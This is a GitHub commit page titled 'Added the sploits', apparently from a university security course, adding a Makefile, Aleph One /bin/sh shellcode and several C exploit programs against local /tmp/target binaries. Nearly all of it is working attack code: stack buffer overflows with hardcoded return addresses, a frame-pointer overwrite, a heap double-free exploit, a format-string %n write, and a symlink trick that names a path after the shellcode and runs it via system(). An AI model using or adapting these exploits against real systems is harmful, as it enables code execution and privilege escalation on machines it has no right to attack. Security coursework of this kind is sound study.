Permalink
Browse files

Added the sploits

  • Loading branch information...
1 parent 92d3a04 commit 02086665a509883225e327129d53b2a7d288c5d4 @atuljangra committed Feb 8, 2014
View
@@ -0,0 +1,25 @@
+# tools
+CC := gcc
+RM := rm -f
+
+# flags
+CFLAGS := -ggdb
+LDFLAGS :=
+LDLIBS :=
+
+# sources
+sources := sploit1.c sploit2.c sploit3.c sploit4.c sploit5.c sploit6.c sploit7.c sploit-ec.c
+targets := $(sources:.c=)
+
+# gmake magic
+.PHONY: default all clean
+
+#targets
+default: all
+all: $(targets)
+
+clean:
+ $(RM) $(targets) $(sources:.c=.o)
+
+#dependencies
+$(sources:.c=.o): shellcode.h
@@ -0,0 +1,7 @@
+/*
+ * Aleph One shellcode.
+ */
+static char shellcode[] =
+ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+ "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+ "\x80\xe8\xdc\xff\xff\xff/bin/sh";
@@ -0,0 +1,55 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include "shellcode.h"
+#include <errno.h>
+#include <sys/stat.h>
+
+#define TARGET "/tmp/target-ec"
+#define SIZE 100
+int main(void)
+{
+ char *args[4];
+ char *env[1];
+
+ /*
+ * Shellcode itself contains /, so we need to create __/
+ * and ___/bin/ before creating the desired file, thus -p
+ * creates a directory whose path is the shellcode
+ */
+ static char mkdir_cmd[] =
+ "mkdir -p \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+ "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+ "\x80\xe8\xdc\xff\xff\xff/bin/sh";
+
+ /*
+ * creates a symlink from 'link' file inside directory to /tmp/target-ec
+ * Do we want to use -f here? Just for the sake of removing already existing warning.
+ */
+ static char ln_cmd[] =
+ "ln -s /tmp/target-ec \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+ "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+ "\x80\xe8\xdc\xff\xff\xff/bin/sh/link";
+
+
+ static char symlinkname[] =
+ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+ "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+ "\x80\xe8\xdc\xff\xff\xff/bin/sh/link";
+
+
+ int a = system (mkdir_cmd);
+ int b = system (ln_cmd);
+ printf("%d %d\n", a, b);
+
+ args[0] = TARGET;
+ args[1] = "0xbffffe7c";
+ args[2] = "0xbfffffc9";
+ args[3] = NULL;
+ env[0] = NULL;
+
+ if (0 > execve(symlinkname, args, env))
+ fprintf(stderr, "execve failed.\n");
+ return 0;
+}
View
@@ -0,0 +1,33 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include "shellcode.h"
+
+#define TARGET "/tmp/target1"
+#define NOP 0x90
+int main(void)
+{
+ char *args[3];
+ char *env[1];
+
+ args[0] = TARGET;
+
+ // 132 to reach the return address
+ // 4 for the return address
+ // 1 for NULL
+ args[1] = malloc(137);
+
+ memset(args[1], NOP, 136);
+ args[1][136] = '\0';
+ memcpy(args[1], shellcode, strlen(shellcode));
+ *(unsigned int *)(args[1] + 132) = 0xbffffd78;
+
+ args[2] = NULL;
+ env[0] = NULL;
+
+ if (0 > execve(TARGET, args, env))
+ fprintf(stderr, "execve failed.\n");
+
+ return 0;
+}
View
@@ -0,0 +1,52 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include "shellcode.h"
+
+#define TARGET "/tmp/target2"
+#define NOP 0x90
+#define SIZE 201
+
+int main(void)
+{
+ char *args[3];
+ char *env[1];
+ /* expolit is of type:
+ * nops _____ shellcode _____ shellcode_address ______ %ebp changing byte
+ *
+ */
+ char buffer[SIZE]; // 1 for NULL
+ memset(buffer, NOP, SIZE);
+
+
+ // EBP is at 0xbffff99c val changed into: 0xbffff941
+ // buffer is 0xbffff8d4
+ // Value to be written in the changed ebp si 0x9c - 0x04 (0xbffff998) == 0x98
+ //
+ // addr to shell code is needed to be placed at 0xbffff998, since we have no
+ // ops, that address can be 0xbffff8d8
+ // A8 - 4 because of pop instruction.
+ buffer[SIZE - 1] = 0xA4;
+
+ buffer[SIZE - 2] = 0xbf;
+ buffer[SIZE - 3] = 0xff;
+ buffer[SIZE - 4] = 0xfc;
+ buffer[SIZE - 5] = 0xf4;
+
+
+ // Add the shellcode.
+ int i = SIZE - 5 - strlen(shellcode);
+ memcpy(buffer + i, shellcode, strlen(shellcode));
+
+ args[0] = TARGET;
+
+ args[1] = buffer;
+ args[2] = NULL;
+ env[0] = NULL;
+
+ if (0 > execve(TARGET, args, env))
+ fprintf(stderr, "execve failed.\n");
+
+ return 0;
+}
View
@@ -0,0 +1,41 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include "shellcode.h"
+
+#define TARGET "/tmp/target3"
+#define SIZE 137
+#define NOP 0x90
+int main(void)
+{
+ char *args[3];
+ char *env[1];
+ char buffer[SIZE]; // 1 for NULL
+
+ memset(buffer, NOP, SIZE);
+
+/*
+ * There is no ebp, thus we just want to change the
+ * return address, which is pushed on the stack, so
+ * that it points to one of the arguments, which contains
+ * our shellcode.
+ */
+
+ buffer[SIZE - 1] = 0x6c;
+
+ // Add the shellcode
+ int i = SIZE - 5 - strlen(shellcode);
+ memcpy(buffer + i, shellcode, strlen(shellcode));
+
+ args[0] = TARGET;
+
+ args[1] = buffer;
+ args[2] = NULL;
+ env[0] = NULL;
+
+ if (0 > execve(TARGET, args, env))
+ fprintf(stderr, "execve failed.\n");
+
+ return 0;
+}
View
@@ -0,0 +1,36 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include "shellcode.h"
+
+#define TARGET "/tmp/target4"
+#define NOP 0x90
+#define SIZE 32769
+
+int main(void)
+{
+ char *args[3];
+ char *env[1];
+
+ // Overflow the short.
+ char attack[SIZE];
+
+ memset(attack, NOP, sizeof(attack));
+ attack[32768] = '\0';
+ attack[4019] = 0xbf;
+ attack[4018] = 0xff;
+ attack[4017] = 0x6e;
+ attack[4016] = 0xff;
+
+ memcpy(attack + 100, shellcode, strlen(shellcode));
+
+ args[0] = TARGET;
+ args[1] = attack; args[2] = NULL;
+ env[0] = NULL;
+
+ if (0 > execve(TARGET, args, env))
+ fprintf(stderr, "execve failed.\n");
+
+ return 0;
+}
View
@@ -0,0 +1,64 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include "shellcode.h"
+
+#define TARGET "/tmp/target5"
+#define SIZE 1024
+#define NOP 0x90
+
+/* We want to create the chunk after and before q
+ * such that while freeing second time, we can get
+ * the eip to the shellcode.
+ */
+int main(void)
+{
+ char *args[3];
+ char *env[1];
+
+ long retAddr, bufAddr, jumpInstruction;
+
+ char attack[SIZE];
+
+ // Filling with 1. This is done so that everything seems free.
+ memset(attack, 1, SIZE);
+
+ retAddr = 0xbffffa8c; // $ebp + 4 or ret for the foo
+ bufAddr = 0x08049bc8; // Starting of the buffer. This will point
+ // to the jmp instruction.
+ /*
+ * Copying into the string.
+ * Got the correct address after some debugging.
+ * p is at 0x08049bc8 and q is at 0x8049d60.
+ */
+
+ memcpy(&attack[400], &bufAddr, 4);
+ memcpy(&attack[404], &retAddr, 4);
+
+ /*
+ * 2 bytes long instrution.
+ * eb: short jump.
+ * 06: 6 bytes.
+ * because, we need to jump 32 - 2 bytes above to reach the shellcode
+ */
+ jumpInstruction = 0xffff1eeb;
+ memcpy(attack, &jumpInstruction, 2);
+
+ /*
+ * Adding shellcode to the attack string
+ */
+ memcpy(attack + 32, shellcode, strlen(shellcode));
+
+ attack[SIZE - 1] = '\0';
+
+ args[0] = TARGET;
+ args[1] = attack;
+ args[2] = NULL;
+ env[0] = NULL;
+
+ if (0 > execve(TARGET, args, env))
+ fprintf(stderr, "execve failed.\n");
+
+ return 0;
+}
View
@@ -0,0 +1,66 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include "shellcode.h"
+
+#define TARGET "/tmp/target6"
+#define SIZE 256
+int main(void)
+{
+ char *args[3];
+ char *env[1];
+
+ char attack[SIZE];
+ char * format;
+ char * dummyAddr;
+ memset(attack, 0x90, SIZE);
+
+ // attack[255] = '\0';
+
+ /*
+ * 4 dummy - address pairs.
+ * This is used as a writing address for the format string.
+ * Address being used: 0xbffffd8c <--- Overwriting this
+ * to go to the shell code.
+ */
+ dummyAddr = "\xff\xff\xff\xff\x8c\xfd\xff\xbf"
+ "\xff\xff\xff\xff\x8d\xfd\xff\xbf"
+ "\xff\xff\xff\xff\x8e\xfd\xff\xbf"
+ "\xff\xff\xff\xff\x8f\xfd\xff\xbf";
+
+ /*
+ * This is calculated properly using the
+ * already written character count.
+ *
+ * sizeof dummyAddr is 32
+ * */
+ format = "%08x%08x%08x"
+ "%165x%n%241x%n%256x%n%192x%n";
+ /*
+ * Attack string is as follows
+ * __________ DummyAddrPairs__________
+ * | |
+ * | |
+ * |____________Shell code____________|
+ * | |
+ * | |
+ * |__________Format string___________|
+ * |...... NOP........ NOP......NOP...|
+ */
+
+ memcpy(attack, dummyAddr, strlen(dummyAddr));
+ memcpy(attack + strlen(dummyAddr), shellcode, strlen(shellcode));
+ memcpy(attack + strlen(shellcode) + strlen(dummyAddr) + 4, format, strlen(format));
+
+
+ args[0] = TARGET;
+ args[1] = attack;
+ args[2] = NULL;
+ env[0] = NULL;
+
+ if (0 > execve(TARGET, args, env))
+ fprintf(stderr, "execve failed.\n");
+
+ return 0;
+}
Oops, something went wrong.

0 comments on commit 0208666

Please sign in to comment.